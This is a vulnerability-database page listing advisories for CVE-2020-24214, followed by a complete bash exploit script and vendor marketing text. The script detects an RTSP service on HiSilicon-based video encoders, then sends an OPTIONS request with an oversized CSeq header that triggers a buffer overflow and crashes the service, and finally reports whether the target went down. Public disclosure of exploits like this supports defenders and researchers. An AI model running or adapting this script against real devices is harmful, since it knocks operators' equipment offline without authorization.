| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS) Exploit | 19 Oct 202000:00 | – | zdt | |
| CVE-2020-24214 | 21 Feb 202512:27 | – | circl | |
| CVE-2020-24214 | 6 Oct 202012:58 | – | cve | |
| CVE-2020-24214 | 6 Oct 202012:58 | – | cvelist | |
| CVE-2020-24214 | 6 Oct 202013:15 | – | nvd | |
| HiSilicon Video Encoder Buffer Overflow / Denial Of Service | 19 Oct 202000:00 | – | packetstorm | |
| Design/Logic Flaw | 6 Oct 202013:15 | – | prion | |
| IPTV encoder devices contain multiple vulnerabilities | 15 Sep 202000:00 | – | cert |
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "usage: $0 <server> <RTSP port>"
exit 1
fi
server=$1
port=$2
printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
|| { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"
cseq=$(printf "0%0.s" {1..3000})
printf "sending the payload... "
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"
sleep 1
printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
echo "ERROR: the RTSP server still seems to be running :("
else
echo "SUCCESS: the server is down"
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation